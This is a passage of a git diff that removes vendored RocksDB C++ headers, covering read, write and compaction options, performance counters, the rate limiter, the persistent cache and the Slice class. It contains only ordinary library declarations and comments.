-                          // Get and MultiGet and does not support iterators.
-  kMemtableTier = 0x3     // data in memtable. used for memtable-only iterators.
-};
-
-// Options that control read operations
-struct ReadOptions {
-  // If "snapshot" is non-nullptr, read as of the supplied snapshot
-  // (which must belong to the DB that is being read and which must
-  // not have been released).  If "snapshot" is nullptr, use an implicit
-  // snapshot of the state at the beginning of this read operation.
-  // Default: nullptr
-  const Snapshot* snapshot;
-
-  // "iterate_upper_bound" defines the extent upto which the forward iterator
-  // can returns entries. Once the bound is reached, Valid() will be false.
-  // "iterate_upper_bound" is exclusive ie the bound value is
-  // not a valid entry.  If iterator_extractor is not null, the Seek target
-  // and iterator_upper_bound need to have the same prefix.
-  // This is because ordering is not guaranteed outside of prefix domain.
-  // There is no lower bound on the iterator. If needed, that can be easily
-  // implemented.
-  //
-  // Default: nullptr
-  const Slice* iterate_upper_bound;
-
-  // If non-zero, NewIterator will create a new table reader which
-  // performs reads of the given size. Using a large size (> 2MB) can
-  // improve the performance of forward iteration on spinning disks.
-  // Default: 0
-  size_t readahead_size;
-
-  // A threshold for the number of keys that can be skipped before failing an
-  // iterator seek as incomplete. The default value of 0 should be used to
-  // never fail a request as incomplete, even on skipping too many keys.
-  // Default: 0
-  uint64_t max_skippable_internal_keys;
-
-  // Specify if this read request should process data that ALREADY
-  // resides on a particular cache. If the required data is not
-  // found at the specified cache, then Status::Incomplete is returned.
-  // Default: kReadAllTier
-  ReadTier read_tier;
-
-  // If true, all data read from underlying storage will be
-  // verified against corresponding checksums.
-  // Default: true
-  bool verify_checksums;
-
-  // Should the "data block"/"index block"/"filter block" read for this
-  // iteration be cached in memory?
-  // Callers may wish to set this field to false for bulk scans.
-  // Default: true
-  bool fill_cache;
-
-  // Specify to create a tailing iterator -- a special iterator that has a
-  // view of the complete database (i.e. it can also be used to read newly
-  // added data) and is optimized for sequential reads. It will return records
-  // that were inserted into the database after the creation of the iterator.
-  // Default: false
-  // Not supported in ROCKSDB_LITE mode!
-  bool tailing;
-
-  // Specify to create a managed iterator -- a special iterator that
-  // uses less resources by having the ability to free its underlying
-  // resources on request.
-  // Default: false
-  // Not supported in ROCKSDB_LITE mode!
-  bool managed;
-
-  // Enable a total order seek regardless of index format (e.g. hash index)
-  // used in the table. Some table format (e.g. plain table) may not support
-  // this option.
-  // If true when calling Get(), we also skip prefix bloom when reading from
-  // block based table. It provides a way to read existing data after
-  // changing implementation of prefix extractor.
-  bool total_order_seek;
-
-  // Enforce that the iterator only iterates over the same prefix as the seek.
-  // This option is effective only for prefix seeks, i.e. prefix_extractor is
-  // non-null for the column family and total_order_seek is false.  Unlike
-  // iterate_upper_bound, prefix_same_as_start only works within a prefix
-  // but in both directions.
-  // Default: false
-  bool prefix_same_as_start;
-
-  // Keep the blocks loaded by the iterator pinned in memory as long as the
-  // iterator is not deleted, If used when reading from tables created with
-  // BlockBasedTableOptions::use_delta_encoding = false,
-  // Iterator's property "rocksdb.iterator.is-key-pinned" is guaranteed to
-  // return 1.
-  // Default: false
-  bool pin_data;
-
-  // If true, when PurgeObsoleteFile is called in CleanupIteratorState, we
-  // schedule a background job in the flush job queue and delete obsolete files
-  // in background.
-  // Default: false
-  bool background_purge_on_iterator_cleanup;
-
-  // If true, keys deleted using the DeleteRange() API will be visible to
-  // readers until they are naturally deleted during compaction. This improves
-  // read performance in DBs with many range deletions.
-  // Default: false
-  bool ignore_range_deletions;
-
-  ReadOptions();
-  ReadOptions(bool cksum, bool cache);
-};
-
-// Options that control write operations
-struct WriteOptions {
-  // If true, the write will be flushed from the operating system
-  // buffer cache (by calling WritableFile::Sync()) before the write
-  // is considered complete.  If this flag is true, writes will be
-  // slower.
-  //
-  // If this flag is false, and the machine crashes, some recent
-  // writes may be lost.  Note that if it is just the process that
-  // crashes (i.e., the machine does not reboot), no writes will be
-  // lost even if sync==false.
-  //
-  // In other words, a DB write with sync==false has similar
-  // crash semantics as the "write()" system call.  A DB write
-  // with sync==true has similar crash semantics to a "write()"
-  // system call followed by "fdatasync()".
-  //
-  // Default: false
-  bool sync;
-
-  // If true, writes will not first go to the write ahead log,
-  // and the write may got lost after a crash.
-  bool disableWAL;
-
-  // If true and if user is trying to write to column families that don't exist
-  // (they were dropped),  ignore the write (don't return an error). If there
-  // are multiple writes in a WriteBatch, other writes will succeed.
-  // Default: false
-  bool ignore_missing_column_families;
-
-  // If true and we need to wait or sleep for the write request, fails
-  // immediately with Status::Incomplete().
-  bool no_slowdown;
-
-  // If true, this write request is of lower priority if compaction is
-  // behind. In this case, no_slowdown = true, the request will be cancelled
-  // immediately with Status::Incomplete() returned. Otherwise, it will be
-  // slowed down. The slowdown value is determined by RocksDB to guarantee
-  // it introduces minimum impacts to high priority writes.
-  //
-  // Default: false
-  bool low_pri;
-
-  WriteOptions()
-      : sync(false),
-        disableWAL(false),
-        ignore_missing_column_families(false),
-        no_slowdown(false),
-        low_pri(false) {}
-};
-
-// Options that control flush operations
-struct FlushOptions {
-  // If true, the flush will wait until the flush is done.
-  // Default: true
-  bool wait;
-
-  FlushOptions() : wait(true) {}
-};
-
-// Create a Logger from provided DBOptions
-extern Status CreateLoggerFromOptions(const std::string& dbname,
-                                      const DBOptions& options,
-                                      std::shared_ptr<Logger>* logger);
-
-// CompactionOptions are used in CompactFiles() call.
-struct CompactionOptions {
-  // Compaction output compression type
-  // Default: snappy
-  CompressionType compression;
-  // Compaction will create files of size `output_file_size_limit`.
-  // Default: MAX, which means that compaction will create a single file
-  uint64_t output_file_size_limit;
-
-  CompactionOptions()
-      : compression(kSnappyCompression),
-        output_file_size_limit(std::numeric_limits<uint64_t>::max()) {}
-};
-
-// For level based compaction, we can configure if we want to skip/force
-// bottommost level compaction.
-enum class BottommostLevelCompaction {
-  // Skip bottommost level compaction
-  kSkip,
-  // Only compact bottommost level if there is a compaction filter
-  // This is the default option
-  kIfHaveCompactionFilter,
-  // Always compact bottommost level
-  kForce,
-};
-
-// CompactRangeOptions is used by CompactRange() call.
-struct CompactRangeOptions {
-  // If true, no other compaction will run at the same time as this
-  // manual compaction
-  bool exclusive_manual_compaction = true;
-  // If true, compacted files will be moved to the minimum level capable
-  // of holding the data or given level (specified non-negative target_level).
-  bool change_level = false;
-  // If change_level is true and target_level have non-negative value, compacted
-  // files will be moved to target_level.
-  int target_level = -1;
-  // Compaction outputs will be placed in options.db_paths[target_path_id].
-  // Behavior is undefined if target_path_id is out of range.
-  uint32_t target_path_id = 0;
-  // By default level based compaction will only compact the bottommost level
-  // if there is a compaction filter
-  BottommostLevelCompaction bottommost_level_compaction =
-      BottommostLevelCompaction::kIfHaveCompactionFilter;
-};
-
-// IngestExternalFileOptions is used by IngestExternalFile()
-struct IngestExternalFileOptions {
-  // Can be set to true to move the files instead of copying them.
-  bool move_files = false;
-  // If set to false, an ingested file keys could appear in existing snapshots
-  // that where created before the file was ingested.
-  bool snapshot_consistency = true;
-  // If set to false, IngestExternalFile() will fail if the file key range
-  // overlaps with existing keys or tombstones in the DB.
-  bool allow_global_seqno = true;
-  // If set to false and the file key range overlaps with the memtable key range
-  // (memtable flush required), IngestExternalFile will fail.
-  bool allow_blocking_flush = true;
-  // Set to true if you would like duplicate keys in the file being ingested
-  // to be skipped rather than overwriting existing data under that key.
-  // Usecase: back-fill of some historical data in the database without
-  // over-writing existing newer version of data.
-  // This option could only be used if the DB has been running
-  // with allow_ingest_behind=true since the dawn of time.
-  // All files will be ingested at the bottommost level with seqno=0.
-  bool ingest_behind = false;
-};
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_OPTIONS_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/perf_context.h b/thirdparty/rocksdb/include/rocksdb/perf_context.h
deleted file mode 100644
index 1095d06..0000000
--- a/thirdparty/rocksdb/include/rocksdb/perf_context.h
+++ /dev/null
@@ -1,164 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_PERF_CONTEXT_H
-#define STORAGE_ROCKSDB_INCLUDE_PERF_CONTEXT_H
-
-#include <stdint.h>
-#include <string>
-
-#include "rocksdb/perf_level.h"
-
-namespace rocksdb {
-
-// A thread local context for gathering performance counter efficiently
-// and transparently.
-// Use SetPerfLevel(PerfLevel::kEnableTime) to enable time stats.
-
-struct PerfContext {
-
-  void Reset(); // reset all performance counters to zero
-
-  std::string ToString(bool exclude_zero_counters = false) const;
-
-  uint64_t user_key_comparison_count; // total number of user key comparisons
-  uint64_t block_cache_hit_count;     // total number of block cache hits
-  uint64_t block_read_count;          // total number of block reads (with IO)
-  uint64_t block_read_byte;           // total number of bytes from block reads
-  uint64_t block_read_time;           // total nanos spent on block reads
-  uint64_t block_checksum_time;       // total nanos spent on block checksum
-  uint64_t block_decompress_time;  // total nanos spent on block decompression
-
-  uint64_t get_read_bytes;       // bytes for vals returned by Get
-  uint64_t multiget_read_bytes;  // bytes for vals returned by MultiGet
-  uint64_t iter_read_bytes;      // bytes for keys/vals decoded by iterator
-
-  // total number of internal keys skipped over during iteration.
-  // There are several reasons for it:
-  // 1. when calling Next(), the iterator is in the position of the previous
-  //    key, so that we'll need to skip it. It means this counter will always
-  //    be incremented in Next().
-  // 2. when calling Next(), we need to skip internal entries for the previous
-  //    keys that are overwritten.
-  // 3. when calling Next(), Seek() or SeekToFirst(), after previous key
-  //    before calling Next(), the seek key in Seek() or the beginning for
-  //    SeekToFirst(), there may be one or more deleted keys before the next
-  //    valid key that the operation should place the iterator to. We need
-  //    to skip both of the tombstone and updates hidden by the tombstones. The
-  //    tombstones are not included in this counter, while previous updates
-  //    hidden by the tombstones will be included here.
-  // 4. symmetric cases for Prev() and SeekToLast()
-  // internal_recent_skipped_count is not included in this counter.
-  //
-  uint64_t internal_key_skipped_count;
-  // Total number of deletes and single deletes skipped over during iteration
-  // When calling Next(), Seek() or SeekToFirst(), after previous position
-  // before calling Next(), the seek key in Seek() or the beginning for
-  // SeekToFirst(), there may be one or more deleted keys before the next valid
-  // key. Every deleted key is counted once. We don't recount here if there are
-  // still older updates invalidated by the tombstones.
-  //
-  uint64_t internal_delete_skipped_count;
-  // How many times iterators skipped over internal keys that are more recent
-  // than the snapshot that iterator is using.
-  //
-  uint64_t internal_recent_skipped_count;
-  // How many values were fed into merge operator by iterators.
-  //
-  uint64_t internal_merge_count;
-
-  uint64_t get_snapshot_time;       // total nanos spent on getting snapshot
-  uint64_t get_from_memtable_time;  // total nanos spent on querying memtables
-  uint64_t get_from_memtable_count;    // number of mem tables queried
-  // total nanos spent after Get() finds a key
-  uint64_t get_post_process_time;
-  uint64_t get_from_output_files_time;  // total nanos reading from output files
-  // total nanos spent on seeking memtable
-  uint64_t seek_on_memtable_time;
-  // number of seeks issued on memtable
-  // (including SeekForPrev but not SeekToFirst and SeekToLast)
-  uint64_t seek_on_memtable_count;
-  // number of Next()s issued on memtable
-  uint64_t next_on_memtable_count;
-  // number of Prev()s issued on memtable
-  uint64_t prev_on_memtable_count;
-  // total nanos spent on seeking child iters
-  uint64_t seek_child_seek_time;
-  // number of seek issued in child iterators
-  uint64_t seek_child_seek_count;
-  uint64_t seek_min_heap_time;  // total nanos spent on the merge min heap
-  uint64_t seek_max_heap_time;  // total nanos spent on the merge max heap
-  // total nanos spent on seeking the internal entries
-  uint64_t seek_internal_seek_time;
-  // total nanos spent on iterating internal entries to find the next user entry
-  uint64_t find_next_user_entry_time;
-
-  // total nanos spent on writing to WAL
-  uint64_t write_wal_time;
-  // total nanos spent on writing to mem tables
-  uint64_t write_memtable_time;
-  // total nanos spent on delaying write
-  uint64_t write_delay_time;
-  // total nanos spent on writing a record, excluding the above three times
-  uint64_t write_pre_and_post_process_time;
-
-  uint64_t db_mutex_lock_nanos;      // time spent on acquiring DB mutex.
-  // Time spent on waiting with a condition variable created with DB mutex.
-  uint64_t db_condition_wait_nanos;
-  // Time spent on merge operator.
-  uint64_t merge_operator_time_nanos;
-
-  // Time spent on reading index block from block cache or SST file
-  uint64_t read_index_block_nanos;
-  // Time spent on reading filter block from block cache or SST file
-  uint64_t read_filter_block_nanos;
-  // Time spent on creating data block iterator
-  uint64_t new_table_block_iter_nanos;
-  // Time spent on creating a iterator of an SST file.
-  uint64_t new_table_iterator_nanos;
-  // Time spent on seeking a key in data/index blocks
-  uint64_t block_seek_nanos;
-  // Time spent on finding or creating a table reader
-  uint64_t find_table_nanos;
-  // total number of mem table bloom hits
-  uint64_t bloom_memtable_hit_count;
-  // total number of mem table bloom misses
-  uint64_t bloom_memtable_miss_count;
-  // total number of SST table bloom hits
-  uint64_t bloom_sst_hit_count;
-  // total number of SST table bloom misses
-  uint64_t bloom_sst_miss_count;
-
-  // Total time spent in Env filesystem operations. These are only populated
-  // when TimedEnv is used.
-  uint64_t env_new_sequential_file_nanos;
-  uint64_t env_new_random_access_file_nanos;
-  uint64_t env_new_writable_file_nanos;
-  uint64_t env_reuse_writable_file_nanos;
-  uint64_t env_new_random_rw_file_nanos;
-  uint64_t env_new_directory_nanos;
-  uint64_t env_file_exists_nanos;
-  uint64_t env_get_children_nanos;
-  uint64_t env_get_children_file_attributes_nanos;
-  uint64_t env_delete_file_nanos;
-  uint64_t env_create_dir_nanos;
-  uint64_t env_create_dir_if_missing_nanos;
-  uint64_t env_delete_dir_nanos;
-  uint64_t env_get_file_size_nanos;
-  uint64_t env_get_file_modification_time_nanos;
-  uint64_t env_rename_file_nanos;
-  uint64_t env_link_file_nanos;
-  uint64_t env_lock_file_nanos;
-  uint64_t env_unlock_file_nanos;
-  uint64_t env_new_logger_nanos;
-};
-
-// Get Thread-local PerfContext object pointer
-// if defined(NPERF_CONTEXT), then the pointer is not thread-local
-PerfContext* get_perf_context();
-
-}
-
-#endif
diff --git a/thirdparty/rocksdb/include/rocksdb/perf_level.h b/thirdparty/rocksdb/include/rocksdb/perf_level.h
deleted file mode 100644
index 84a331c..0000000
--- a/thirdparty/rocksdb/include/rocksdb/perf_level.h
+++ /dev/null
@@ -1,33 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef INCLUDE_ROCKSDB_PERF_LEVEL_H_
-#define INCLUDE_ROCKSDB_PERF_LEVEL_H_
-
-#include <stdint.h>
-#include <string>
-
-namespace rocksdb {
-
-// How much perf stats to collect. Affects perf_context and iostats_context.
-enum PerfLevel : unsigned char {
-  kUninitialized = 0,             // unknown setting
-  kDisable = 1,                   // disable perf stats
-  kEnableCount = 2,               // enable only count stats
-  kEnableTimeExceptForMutex = 3,  // Other than count stats, also enable time
-                                  // stats except for mutexes
-  kEnableTime = 4,                // enable count and time stats
-  kOutOfBounds = 5                // N.B. Must always be the last value!
-};
-
-// set the perf stats level for current thread
-void SetPerfLevel(PerfLevel level);
-
-// get current perf stats level for current thread
-PerfLevel GetPerfLevel();
-
-}  // namespace rocksdb
-
-#endif  // INCLUDE_ROCKSDB_PERF_LEVEL_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/persistent_cache.h b/thirdparty/rocksdb/include/rocksdb/persistent_cache.h
deleted file mode 100644
index 05c3685..0000000
--- a/thirdparty/rocksdb/include/rocksdb/persistent_cache.h
+++ /dev/null
@@ -1,67 +0,0 @@
-// Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <stdint.h>
-#include <memory>
-#include <string>
-
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-// PersistentCache
-//
-// Persistent cache interface for caching IO pages on a persistent medium. The
-// cache interface is specifically designed for persistent read cache.
-class PersistentCache {
- public:
-  typedef std::vector<std::map<std::string, double>> StatsType;
-
-  virtual ~PersistentCache() {}
-
-  // Insert to page cache
-  //
-  // page_key   Identifier to identify a page uniquely across restarts
-  // data       Page data
-  // size       Size of the page
-  virtual Status Insert(const Slice& key, const char* data,
-                        const size_t size) = 0;
-
-  // Lookup page cache by page identifier
-  //
-  // page_key   Page identifier
-  // buf        Buffer where the data should be copied
-  // size       Size of the page
-  virtual Status Lookup(const Slice& key, std::unique_ptr<char[]>* data,
-                        size_t* size) = 0;
-
-  // Is cache storing uncompressed data ?
-  //
-  // True if the cache is configured to store uncompressed data else false
-  virtual bool IsCompressed() = 0;
-
-  // Return stats as map of {string, double} per-tier
-  //
-  // Persistent cache can be initialized as a tier of caches. The stats are per
-  // tire top-down
-  virtual StatsType Stats() = 0;
-
-  virtual std::string GetPrintableOptions() const = 0;
-};
-
-// Factor method to create a new persistent cache
-Status NewPersistentCache(Env* const env, const std::string& path,
-                          const uint64_t size,
-                          const std::shared_ptr<Logger>& log,
-                          const bool optimized_for_nvm,
-                          std::shared_ptr<PersistentCache>* cache);
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/rate_limiter.h b/thirdparty/rocksdb/include/rocksdb/rate_limiter.h
deleted file mode 100644
index 838c98a..0000000
--- a/thirdparty/rocksdb/include/rocksdb/rate_limiter.h
+++ /dev/null
@@ -1,135 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include "rocksdb/env.h"
-#include "rocksdb/statistics.h"
-
-namespace rocksdb {
-
-class RateLimiter {
- public:
-  enum class OpType {
-    // Limitation: we currently only invoke Request() with OpType::kRead for
-    // compactions when DBOptions::new_table_reader_for_compaction_inputs is set
-    kRead,
-    kWrite,
-  };
-  enum class Mode {
-    kReadsOnly,
-    kWritesOnly,
-    kAllIo,
-  };
-
-  // For API compatibility, default to rate-limiting writes only.
-  explicit RateLimiter(Mode mode = Mode::kWritesOnly) : mode_(mode) {}
-
-  virtual ~RateLimiter() {}
-
-  // This API allows user to dynamically change rate limiter's bytes per second.
-  // REQUIRED: bytes_per_second > 0
-  virtual void SetBytesPerSecond(int64_t bytes_per_second) = 0;
-
-  // Deprecated. New RateLimiter derived classes should override
-  // Request(const int64_t, const Env::IOPriority, Statistics*) or
-  // Request(const int64_t, const Env::IOPriority, Statistics*, OpType)
-  // instead.
-  //
-  // Request for token for bytes. If this request can not be satisfied, the call
-  // is blocked. Caller is responsible to make sure
-  // bytes <= GetSingleBurstBytes()
-  virtual void Request(const int64_t bytes, const Env::IOPriority pri) {
-    assert(false);
-  }
-
-  // Request for token for bytes and potentially update statistics. If this
-  // request can not be satisfied, the call is blocked. Caller is responsible to
-  // make sure bytes <= GetSingleBurstBytes().
-  virtual void Request(const int64_t bytes, const Env::IOPriority pri,
-                       Statistics* /* stats */) {
-    // For API compatibility, default implementation calls the older API in
-    // which statistics are unsupported.
-    Request(bytes, pri);
-  }
-
-  // Requests token to read or write bytes and potentially updates statistics.
-  //
-  // If this request can not be satisfied, the call is blocked. Caller is
-  // responsible to make sure bytes <= GetSingleBurstBytes().
-  virtual void Request(const int64_t bytes, const Env::IOPriority pri,
-                       Statistics* stats, OpType op_type) {
-    if (IsRateLimited(op_type)) {
-      Request(bytes, pri, stats);
-    }
-  }
-
-  // Requests token to read or write bytes and potentially updates statistics.
-  // Takes into account GetSingleBurstBytes() and alignment (e.g., in case of
-  // direct I/O) to allocate an appropriate number of bytes, which may be less
-  // than the number of bytes requested.
-  virtual size_t RequestToken(size_t bytes, size_t alignment,
-                              Env::IOPriority io_priority, Statistics* stats,
-                              RateLimiter::OpType op_type);
-
-  // Max bytes can be granted in a single burst
-  virtual int64_t GetSingleBurstBytes() const = 0;
-
-  // Total bytes that go though rate limiter
-  virtual int64_t GetTotalBytesThrough(
-      const Env::IOPriority pri = Env::IO_TOTAL) const = 0;
-
-  // Total # of requests that go though rate limiter
-  virtual int64_t GetTotalRequests(
-      const Env::IOPriority pri = Env::IO_TOTAL) const = 0;
-
-  virtual int64_t GetBytesPerSecond() const = 0;
-
-  virtual bool IsRateLimited(OpType op_type) {
-    if ((mode_ == RateLimiter::Mode::kWritesOnly &&
-         op_type == RateLimiter::OpType::kRead) ||
-        (mode_ == RateLimiter::Mode::kReadsOnly &&
-         op_type == RateLimiter::OpType::kWrite)) {
-      return false;
-    }
-    return true;
-  }
-
- protected:
-  Mode GetMode() { return mode_; }
-
- private:
-  const Mode mode_;
-};
-
-// Create a RateLimiter object, which can be shared among RocksDB instances to
-// control write rate of flush and compaction.
-// @rate_bytes_per_sec: this is the only parameter you want to set most of the
-// time. It controls the total write rate of compaction and flush in bytes per
-// second. Currently, RocksDB does not enforce rate limit for anything other
-// than flush and compaction, e.g. write to WAL.
-// @refill_period_us: this controls how often tokens are refilled. For example,
-// when rate_bytes_per_sec is set to 10MB/s and refill_period_us is set to
-// 100ms, then 1MB is refilled every 100ms internally. Larger value can lead to
-// burstier writes while smaller value introduces more CPU overhead.
-// The default should work for most cases.
-// @fairness: RateLimiter accepts high-pri requests and low-pri requests.
-// A low-pri request is usually blocked in favor of hi-pri request. Currently,
-// RocksDB assigns low-pri to request from compaction and high-pri to request
-// from flush. Low-pri requests can get blocked if flush requests come in
-// continuously. This fairness parameter grants low-pri requests permission by
-// 1/fairness chance even though high-pri requests exist to avoid starvation.
-// You should be good by leaving it at default 10.
-// @mode: Mode indicates which types of operations count against the limit.
-extern RateLimiter* NewGenericRateLimiter(
-    int64_t rate_bytes_per_sec, int64_t refill_period_us = 100 * 1000,
-    int32_t fairness = 10,
-    RateLimiter::Mode mode = RateLimiter::Mode::kWritesOnly);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/slice.h b/thirdparty/rocksdb/include/rocksdb/slice.h
deleted file mode 100644
index 4f24c8a..0000000
--- a/thirdparty/rocksdb/include/rocksdb/slice.h
+++ /dev/null
@@ -1,242 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Slice is a simple structure containing a pointer into some external
-// storage and a size.  The user of a Slice must ensure that the slice
-// is not used after the corresponding external storage has been
-// deallocated.
-//
-// Multiple threads can invoke const methods on a Slice without
-// external synchronization, but if any of the threads may call a
-// non-const method, all threads accessing the same Slice must use
-// external synchronization.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_SLICE_H_
-#define STORAGE_ROCKSDB_INCLUDE_SLICE_H_
-
-#include <assert.h>
-#include <cstdio>
-#include <stddef.h>
-#include <string.h>
-#include <string>
-
-#include "rocksdb/cleanable.h"
-
-namespace rocksdb {
-
-class Slice {
- public:
-  // Create an empty slice.
-  Slice() : data_(""), size_(0) { }
-
-  // Create a slice that refers to d[0,n-1].
-  Slice(const char* d, size_t n) : data_(d), size_(n) { }
-
-  // Create a slice that refers to the contents of "s"
-  /* implicit */
-  Slice(const std::string& s) : data_(s.data()), size_(s.size()) { }
-
-  // Create a slice that refers to s[0,strlen(s)-1]
-  /* implicit */
-  Slice(const char* s) : data_(s), size_(strlen(s)) { }
-
-  // Create a single slice from SliceParts using buf as storage.
-  // buf must exist as long as the returned Slice exists.
-  Slice(const struct SliceParts& parts, std::string* buf);
-
-  // Return a pointer to the beginning of the referenced data
-  const char* data() const { return data_; }
-
-  // Return the length (in bytes) of the referenced data
-  size_t size() const { return size_; }
-
-  // Return true iff the length of the referenced data is zero
-  bool empty() const { return size_ == 0; }
-
-  // Return the ith byte in the referenced data.
-  // REQUIRES: n < size()
-  char operator[](size_t n) const {
-    assert(n < size());
-    return data_[n];
-  }
-
-  // Change this slice to refer to an empty array
-  void clear() { data_ = ""; size_ = 0; }
-
-  // Drop the first "n" bytes from this slice.
-  void remove_prefix(size_t n) {
-    assert(n <= size());
-    data_ += n;
-    size_ -= n;
-  }
-
-  void remove_suffix(size_t n) {
-    assert(n <= size());
-    size_ -= n;
-  }
-
-  // Return a string that contains the copy of the referenced data.
-  // when hex is true, returns a string of twice the length hex encoded (0-9A-F)
-  std::string ToString(bool hex = false) const;
-
-  // Decodes the current slice interpreted as an hexadecimal string into result,
-  // if successful returns true, if this isn't a valid hex string
-  // (e.g not coming from Slice::ToString(true)) DecodeHex returns false.
-  // This slice is expected to have an even number of 0-9A-F characters
-  // also accepts lowercase (a-f)
-  bool DecodeHex(std::string* result) const;
-
-  // Three-way comparison.  Returns value:
-  //   <  0 iff "*this" <  "b",
-  //   == 0 iff "*this" == "b",
-  //   >  0 iff "*this" >  "b"
-  int compare(const Slice& b) const;
-
-  // Return true iff "x" is a prefix of "*this"
-  bool starts_with(const Slice& x) const {
-    return ((size_ >= x.size_) &&
-            (memcmp(data_, x.data_, x.size_) == 0));
-  }
-
-  bool ends_with(const Slice& x) const {
-    return ((size_ >= x.size_) &&
-            (memcmp(data_ + size_ - x.size_, x.data_, x.size_) == 0));
-  }
-
-  // Compare two slices and returns the first byte where they differ
-  size_t difference_offset(const Slice& b) const;
-
- // private: make these public for rocksdbjni access
-  const char* data_;
-  size_t size_;
-
-  // Intentionally copyable
-};
-
-/**
- * A Slice that can be pinned with some cleanup tasks, which will be run upon
- * ::Reset() or object destruction, whichever is invoked first. This can be used
- * to avoid memcpy by having the PinnsableSlice object referring to the data
- * that is locked in the memory and release them after the data is consumed.
- */
-class PinnableSlice : public Slice, public Cleanable {
- public:
-  PinnableSlice() { buf_ = &self_space_; }
-  explicit PinnableSlice(std::string* buf) { buf_ = buf; }
-
-  // No copy constructor and copy assignment allowed.
-  PinnableSlice(PinnableSlice&) = delete;
-  PinnableSlice& operator=(PinnableSlice&) = delete;
-
-  inline void PinSlice(const Slice& s, CleanupFunction f, void* arg1,
-                       void* arg2) {
-    assert(!pinned_);
-    pinned_ = true;
-    data_ = s.data();
-    size_ = s.size();
-    RegisterCleanup(f, arg1, arg2);
-    assert(pinned_);
-  }
-
-  inline void PinSlice(const Slice& s, Cleanable* cleanable) {
-    assert(!pinned_);
-    pinned_ = true;
-    data_ = s.data();
-    size_ = s.size();
-    cleanable->DelegateCleanupsTo(this);
-    assert(pinned_);
-  }
-
-  inline void PinSelf(const Slice& slice) {
-    assert(!pinned_);
-    buf_->assign(slice.data(), slice.size());
-    data_ = buf_->data();
-    size_ = buf_->size();
-    assert(!pinned_);
-  }
-
-  inline void PinSelf() {
-    assert(!pinned_);
-    data_ = buf_->data();
-    size_ = buf_->size();
-    assert(!pinned_);
-  }
-
-  void remove_suffix(size_t n) {
-    assert(n <= size());
-    if (pinned_) {
-      size_ -= n;
-    } else {
-      buf_->erase(size() - n, n);
-      PinSelf();
-    }
-  }
-
-  void remove_prefix(size_t n) {
-    assert(0);  // Not implemented
-  }
-
-  void Reset() {
-    Cleanable::Reset();
-    pinned_ = false;
-  }
-
-  inline std::string* GetSelf() { return buf_; }
-
-  inline bool IsPinned() { return pinned_; }
-
- private:
-  friend class PinnableSlice4Test;
-  std::string self_space_;
-  std::string* buf_;
-  bool pinned_ = false;
-};
-
-// A set of Slices that are virtually concatenated together.  'parts' points
-// to an array of Slices.  The number of elements in the array is 'num_parts'.
-struct SliceParts {
-  SliceParts(const Slice* _parts, int _num_parts) :
-      parts(_parts), num_parts(_num_parts) { }
-  SliceParts() : parts(nullptr), num_parts(0) {}
-
-  const Slice* parts;
-  int num_parts;
-};
-
-inline bool operator==(const Slice& x, const Slice& y) {
-  return ((x.size() == y.size()) &&
-          (memcmp(x.data(), y.data(), x.size()) == 0));
-}
-
-inline bool operator!=(const Slice& x, const Slice& y) {
-  return !(x == y);
-}
-
-inline int Slice::compare(const Slice& b) const {
-  assert(data_ != nullptr && b.data_ != nullptr);
-  const size_t min_len = (size_ < b.size_) ? size_ : b.size_;
-  int r = memcmp(data_, b.data_, min_len);
-  if (r == 0) {
-    if (size_ < b.size_) r = -1;
-    else if (size_ > b.size_) r = +1;
-  }
-  return r;
-}
-
-inline size_t Slice::difference_offset(const Slice& b) const {
-  size_t off = 0;
-  const size_t len = (size_ < b.size_) ? size_ : b.size_;
-  for (; off < len; off++) {
-    if (data_[off] != b.data_[off]) break;
-  }
-  return off;
-}
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_SLICE_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/slice_transform.h b/thirdparty/rocksdb/include/rocksdb/slice_transform.h
deleted file mode 100644
index fc82bf5..0000000
--- a/thirdparty/rocksdb/include/rocksdb/slice_transform.h
+++ /dev/null
@@ -1,99 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
